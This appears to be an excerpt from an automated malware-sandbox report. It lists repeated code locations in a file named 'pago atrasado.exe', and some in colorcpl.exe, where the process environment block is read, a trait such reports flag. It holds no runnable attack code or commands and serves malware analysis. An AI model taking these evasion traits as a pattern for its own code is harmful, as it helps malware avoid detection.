Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EB944 mov eax, dword ptr fs:[00000030h] 1_2_009EB944
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EB944 mov eax, dword ptr fs:[00000030h] 1_2_009EB944
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CB171 mov eax, dword ptr fs:[00000030h] 1_2_009CB171
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CB171 mov eax, dword ptr fs:[00000030h] 1_2_009CB171
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CC962 mov eax, dword ptr fs:[00000030h] 1_2_009CC962
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FD294 mov eax, dword ptr fs:[00000030h] 1_2_009FD294
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FD294 mov eax, dword ptr fs:[00000030h] 1_2_009FD294
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DAAB0 mov eax, dword ptr fs:[00000030h] 1_2_009DAAB0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DAAB0 mov eax, dword ptr fs:[00000030h] 1_2_009DAAB0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FFAB0 mov eax, dword ptr fs:[00000030h] 1_2_009FFAB0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h] 1_2_009C52A5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h] 1_2_009C52A5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h] 1_2_009C52A5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h] 1_2_009C52A5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C52A5 mov eax, dword ptr fs:[00000030h] 1_2_009C52A5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F2ACB mov eax, dword ptr fs:[00000030h] 1_2_009F2ACB
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F2AE4 mov eax, dword ptr fs:[00000030h] 1_2_009F2AE4
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E3A1C mov eax, dword ptr fs:[00000030h] 1_2_009E3A1C
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CAA16 mov eax, dword ptr fs:[00000030h] 1_2_009CAA16
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CAA16 mov eax, dword ptr fs:[00000030h] 1_2_009CAA16
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A04A2C mov eax, dword ptr fs:[00000030h] 1_2_00A04A2C
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A04A2C mov eax, dword ptr fs:[00000030h] 1_2_00A04A2C
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C5210 mov eax, dword ptr fs:[00000030h] 1_2_009C5210
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C5210 mov ecx, dword ptr fs:[00000030h] 1_2_009C5210
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C5210 mov eax, dword ptr fs:[00000030h] 1_2_009C5210
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C5210 mov eax, dword ptr fs:[00000030h] 1_2_009C5210
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D8A0A mov eax, dword ptr fs:[00000030h] 1_2_009D8A0A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8AA16 mov eax, dword ptr fs:[00000030h] 1_2_00A8AA16
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8AA16 mov eax, dword ptr fs:[00000030h] 1_2_00A8AA16
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A7B260 mov eax, dword ptr fs:[00000030h] 1_2_00A7B260
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A7B260 mov eax, dword ptr fs:[00000030h] 1_2_00A7B260
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A98A62 mov eax, dword ptr fs:[00000030h] 1_2_00A98A62
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0927A mov eax, dword ptr fs:[00000030h] 1_2_00A0927A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h] 1_2_009C9240
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h] 1_2_009C9240
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h] 1_2_009C9240
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C9240 mov eax, dword ptr fs:[00000030h] 1_2_009C9240
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A54257 mov eax, dword ptr fs:[00000030h] 1_2_00A54257
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8EA55 mov eax, dword ptr fs:[00000030h] 1_2_00A8EA55
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F2397 mov eax, dword ptr fs:[00000030h] 1_2_009F2397
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A95BA5 mov eax, dword ptr fs:[00000030h] 1_2_00A95BA5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FB390 mov eax, dword ptr fs:[00000030h] 1_2_009FB390
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D1B8F mov eax, dword ptr fs:[00000030h] 1_2_009D1B8F
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D1B8F mov eax, dword ptr fs:[00000030h] 1_2_009D1B8F
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8138A mov eax, dword ptr fs:[00000030h] 1_2_00A8138A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A7D380 mov ecx, dword ptr fs:[00000030h] 1_2_00A7D380
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F4BAD mov eax, dword ptr fs:[00000030h] 1_2_009F4BAD
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F4BAD mov eax, dword ptr fs:[00000030h] 1_2_009F4BAD
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F4BAD mov eax, dword ptr fs:[00000030h] 1_2_009F4BAD
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A453CA mov eax, dword ptr fs:[00000030h] 1_2_00A453CA
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A453CA mov eax, dword ptr fs:[00000030h] 1_2_00A453CA
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EDBE9 mov eax, dword ptr fs:[00000030h] 1_2_009EDBE9
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h] 1_2_009F03E2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h] 1_2_009F03E2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h] 1_2_009F03E2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h] 1_2_009F03E2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h] 1_2_009F03E2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F03E2 mov eax, dword ptr fs:[00000030h] 1_2_009F03E2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8131B mov eax, dword ptr fs:[00000030h] 1_2_00A8131B
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CF358 mov eax, dword ptr fs:[00000030h] 1_2_009CF358
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CDB40 mov eax, dword ptr fs:[00000030h] 1_2_009CDB40
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F3B7A mov eax, dword ptr fs:[00000030h] 1_2_009F3B7A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F3B7A mov eax, dword ptr fs:[00000030h] 1_2_009F3B7A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A98B58 mov eax, dword ptr fs:[00000030h] 1_2_00A98B58
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CDB60 mov ecx, dword ptr fs:[00000030h] 1_2_009CDB60
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D849B mov eax, dword ptr fs:[00000030h] 1_2_009D849B
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A814FB mov eax, dword ptr fs:[00000030h] 1_2_00A814FB
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A46CF0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A46CF0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46CF0 mov eax, dword ptr fs:[00000030h] 1_2_00A46CF0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A98CD6 mov eax, dword ptr fs:[00000030h] 1_2_00A98CD6
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A9740D mov eax, dword ptr fs:[00000030h] 1_2_00A9740D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A9740D mov eax, dword ptr fs:[00000030h] 1_2_00A9740D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A9740D mov eax, dword ptr fs:[00000030h] 1_2_00A9740D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81C06 mov eax, dword ptr fs:[00000030h] 1_2_00A81C06
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h] 1_2_00A46C0A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h] 1_2_00A46C0A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h] 1_2_00A46C0A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46C0A mov eax, dword ptr fs:[00000030h] 1_2_00A46C0A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FBC2C mov eax, dword ptr fs:[00000030h] 1_2_009FBC2C
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FA44B mov eax, dword ptr fs:[00000030h] 1_2_009FA44B
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E746D mov eax, dword ptr fs:[00000030h] 1_2_009E746D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5C450 mov eax, dword ptr fs:[00000030h] 1_2_00A5C450
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5C450 mov eax, dword ptr fs:[00000030h] 1_2_00A5C450
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FFD9B mov eax, dword ptr fs:[00000030h] 1_2_009FFD9B
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FFD9B mov eax, dword ptr fs:[00000030h] 1_2_009FFD9B
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A905AC mov eax, dword ptr fs:[00000030h] 1_2_00A905AC
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A905AC mov eax, dword ptr fs:[00000030h] 1_2_00A905AC
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h] 1_2_009C2D8A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h] 1_2_009C2D8A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h] 1_2_009C2D8A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h] 1_2_009C2D8A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C2D8A mov eax, dword ptr fs:[00000030h] 1_2_009C2D8A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h] 1_2_009F2581
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h] 1_2_009F2581
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h] 1_2_009F2581
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F2581 mov eax, dword ptr fs:[00000030h] 1_2_009F2581
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F1DB5 mov eax, dword ptr fs:[00000030h] 1_2_009F1DB5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F1DB5 mov eax, dword ptr fs:[00000030h] 1_2_009F1DB5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F1DB5 mov eax, dword ptr fs:[00000030h] 1_2_009F1DB5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F35A1 mov eax, dword ptr fs:[00000030h] 1_2_009F35A1
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00A8FDE2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00A8FDE2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00A8FDE2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8FDE2 mov eax, dword ptr fs:[00000030h] 1_2_00A8FDE2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A78DF1 mov eax, dword ptr fs:[00000030h] 1_2_00A78DF1
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h] 1_2_00A46DC9
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h] 1_2_00A46DC9
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h] 1_2_00A46DC9
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46DC9 mov ecx, dword ptr fs:[00000030h] 1_2_00A46DC9
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h] 1_2_00A46DC9
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A46DC9 mov eax, dword ptr fs:[00000030h] 1_2_00A46DC9
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DD5E0 mov eax, dword ptr fs:[00000030h] 1_2_009DD5E0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DD5E0 mov eax, dword ptr fs:[00000030h] 1_2_009DD5E0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8E539 mov eax, dword ptr fs:[00000030h] 1_2_00A8E539
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A4A537 mov eax, dword ptr fs:[00000030h] 1_2_00A4A537
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A98D34 mov eax, dword ptr fs:[00000030h] 1_2_00A98D34
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F4D3B mov eax, dword ptr fs:[00000030h] 1_2_009F4D3B
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F4D3B mov eax, dword ptr fs:[00000030h] 1_2_009F4D3B
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F4D3B mov eax, dword ptr fs:[00000030h] 1_2_009F4D3B
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h] 1_2_009D3D34
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h] 1_2_009D3D34
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h] 1_2_009D3D34
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h] 1_2_009D3D34
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h] 1_2_009D3D34
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h] 1_2_009D3D34
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h] 1_2_009D3D34
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h] 1_2_009D3D34
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h] 1_2_009D3D34
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h] 1_2_009D3D34
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h] 1_2_009D3D34
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h] 1_2_009D3D34
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D3D34 mov eax, dword ptr fs:[00000030h] 1_2_009D3D34
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CAD30 mov eax, dword ptr fs:[00000030h] 1_2_009CAD30
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E7D50 mov eax, dword ptr fs:[00000030h] 1_2_009E7D50
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A03D43 mov eax, dword ptr fs:[00000030h] 1_2_00A03D43
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A43540 mov eax, dword ptr fs:[00000030h] 1_2_00A43540
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EC577 mov eax, dword ptr fs:[00000030h] 1_2_009EC577
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EC577 mov eax, dword ptr fs:[00000030h] 1_2_009EC577
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A446A7 mov eax, dword ptr fs:[00000030h] 1_2_00A446A7
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A90EA5 mov eax, dword ptr fs:[00000030h] 1_2_00A90EA5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A90EA5 mov eax, dword ptr fs:[00000030h] 1_2_00A90EA5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A90EA5 mov eax, dword ptr fs:[00000030h] 1_2_00A90EA5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5FE87 mov eax, dword ptr fs:[00000030h] 1_2_00A5FE87
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F36CC mov eax, dword ptr fs:[00000030h] 1_2_009F36CC
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A7FEC0 mov eax, dword ptr fs:[00000030h] 1_2_00A7FEC0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A08EC7 mov eax, dword ptr fs:[00000030h] 1_2_00A08EC7
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F16E0 mov ecx, dword ptr fs:[00000030h] 1_2_009F16E0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A98ED6 mov eax, dword ptr fs:[00000030h] 1_2_00A98ED6
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D76E2 mov eax, dword ptr fs:[00000030h] 1_2_009D76E2
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FA61C mov eax, dword ptr fs:[00000030h] 1_2_009FA61C
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FA61C mov eax, dword ptr fs:[00000030h] 1_2_009FA61C
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A7FE3F mov eax, dword ptr fs:[00000030h] 1_2_00A7FE3F
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CC600 mov eax, dword ptr fs:[00000030h] 1_2_009CC600
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CC600 mov eax, dword ptr fs:[00000030h] 1_2_009CC600
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CC600 mov eax, dword ptr fs:[00000030h] 1_2_009CC600
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F8E00 mov eax, dword ptr fs:[00000030h] 1_2_009F8E00
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A81608 mov eax, dword ptr fs:[00000030h] 1_2_00A81608
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009CE620 mov eax, dword ptr fs:[00000030h] 1_2_009CE620
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h] 1_2_009D7E41
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h] 1_2_009D7E41
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h] 1_2_009D7E41
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h] 1_2_009D7E41
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h] 1_2_009D7E41
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D7E41 mov eax, dword ptr fs:[00000030h] 1_2_009D7E41
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8AE44 mov eax, dword ptr fs:[00000030h] 1_2_00A8AE44
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8AE44 mov eax, dword ptr fs:[00000030h] 1_2_00A8AE44
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h] 1_2_009EAE73
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h] 1_2_009EAE73
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h] 1_2_009EAE73
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h] 1_2_009EAE73
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EAE73 mov eax, dword ptr fs:[00000030h] 1_2_009EAE73
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D766D mov eax, dword ptr fs:[00000030h] 1_2_009D766D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D8794 mov eax, dword ptr fs:[00000030h] 1_2_009D8794
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A47794 mov eax, dword ptr fs:[00000030h] 1_2_00A47794
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A47794 mov eax, dword ptr fs:[00000030h] 1_2_00A47794
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A47794 mov eax, dword ptr fs:[00000030h] 1_2_00A47794
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A037F5 mov eax, dword ptr fs:[00000030h] 1_2_00A037F5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009EF716 mov eax, dword ptr fs:[00000030h] 1_2_009EF716
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FA70E mov eax, dword ptr fs:[00000030h] 1_2_009FA70E
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FA70E mov eax, dword ptr fs:[00000030h] 1_2_009FA70E
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A9070D mov eax, dword ptr fs:[00000030h] 1_2_00A9070D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A9070D mov eax, dword ptr fs:[00000030h] 1_2_00A9070D
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FE730 mov eax, dword ptr fs:[00000030h] 1_2_009FE730
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C4F2E mov eax, dword ptr fs:[00000030h] 1_2_009C4F2E
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C4F2E mov eax, dword ptr fs:[00000030h] 1_2_009C4F2E
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5FF10 mov eax, dword ptr fs:[00000030h] 1_2_00A5FF10
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5FF10 mov eax, dword ptr fs:[00000030h] 1_2_00A5FF10
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A98F6A mov eax, dword ptr fs:[00000030h] 1_2_00A98F6A
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DEF40 mov eax, dword ptr fs:[00000030h] 1_2_009DEF40
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DFF60 mov eax, dword ptr fs:[00000030h] 1_2_009DFF60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04550050 mov eax, dword ptr fs:[00000030h] 16_2_04550050
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04550050 mov eax, dword ptr fs:[00000030h] 16_2_04550050
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CC450 mov eax, dword ptr fs:[00000030h] 16_2_045CC450
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045CC450 mov eax, dword ptr fs:[00000030h] 16_2_045CC450
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04601074 mov eax, dword ptr fs:[00000030h] 16_2_04601074
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456A44B mov eax, dword ptr fs:[00000030h] 16_2_0456A44B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F2073 mov eax, dword ptr fs:[00000030h] 16_2_045F2073
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0455746D mov eax, dword ptr fs:[00000030h] 16_2_0455746D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B7016 mov eax, dword ptr fs:[00000030h] 16_2_045B7016
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045B7016 mov eax, dword ptr fs:[00000030h] 16_2_045B7016
